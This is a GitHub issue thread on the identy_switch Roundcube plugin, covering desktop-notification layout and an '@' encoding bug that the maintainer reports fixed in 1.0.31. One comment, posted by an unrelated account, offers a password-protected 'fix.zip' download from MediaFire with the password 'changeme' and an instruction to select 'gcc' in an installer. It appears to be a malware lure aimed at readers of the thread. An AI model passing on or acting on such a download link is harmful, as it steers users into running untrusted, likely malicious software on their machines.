### ISSUE TITLE
Beautify Desktop notifications

### ISSUE THREAD

**Issue by CodeShakingSheep** [toteph42/identy_switch#23]
On Ubuntu 22.0.4 the Desktop notification looks like this for me
![image](https://github.com/user-attachments/assets/e91818aa-776f-46c6-984c-6c5be5c40f8d)

There are 2 small issues with that for me.

1. Layout
I think the readability would be better if RC's domain (e.g. mails.<YOUR_DOMAIN>.com) would be displayed in the first row and then the number of unread mails and the identity label `$labels['notify.msg'] = '%d for %s';` in the second row.
2. @ sign is not displayed correctly
Instead of `@` being displayed in the label there is `%40` being displayed. Probably encoding needs to be fixed here.

Do you think these adjustments would be doable?

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by toteph42** [comment]
I'll check encoding, but the other request I'll not implement: In a previous version, I used host name, but it is a useless information. Your identity label should be unique. And this is shown in identity selection list. It's up to your to use the host name as label.

**Comment by toteph42** [comment]
Fixed in 1.0.31
